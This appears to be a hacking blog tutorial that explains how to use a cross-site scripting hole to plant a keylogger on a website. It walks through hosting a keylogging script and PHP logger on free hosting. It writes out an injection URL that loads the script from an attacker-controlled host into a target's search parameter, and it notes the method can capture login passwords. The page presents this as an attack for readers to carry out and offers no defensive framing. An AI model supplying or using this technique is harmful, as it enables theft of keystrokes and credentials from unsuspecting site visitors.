Menu
 

As we all know that Key logger is a program that allow us to view the key pressed by user.In this Tutorial we will learn how to use keylogger on a website to capture all the keystrokes on that page.
like i said previously Xss Attack or Cross site scripting is simple but it can be used in deadlier way
this tutorial only works on Xssed sites ...

As we know that we can run our own scripts on those website which have XSS vulnerability. We use our Keylogging script on XSS vulnerable website.

To perform this Attack we need three thigs

  • Xssed Site(That is a xss vulnerable site)


  • Webhosting sevice (Free)


  • Keylogging Script



  • First Of all Download the script from the below link

    Download Script

    Now create an account in any free hosting web host that supports PHP. PHP will be used to write keystrokes on a text file.

    Now open Logger.js and change the URL of your script. Default URL is http://yourwebsite.com just Change it to your hosting URl.

    Now host all these scripts on your web host.

    Now find a XSS vulnerable website website and include script link like this:
    http://targetwebsite.com/search.php?q="<script src="http://yourwebsite.com/keylogger.js"></script>

    Now if someone clicks on that link everything they type in on that page will go to the data.txt file. This script will capture all the keystroke and save it to the file with the help of PHP script.

    If a website's login page is vulnerable to XSS attack, this script can be used to grab passwords.

    I Believe You all will like my this tutorial Keep Visiting Darksite :)

    Post a Comment

    Feel Free To Ask Your Query we Love To Answer

     
    Top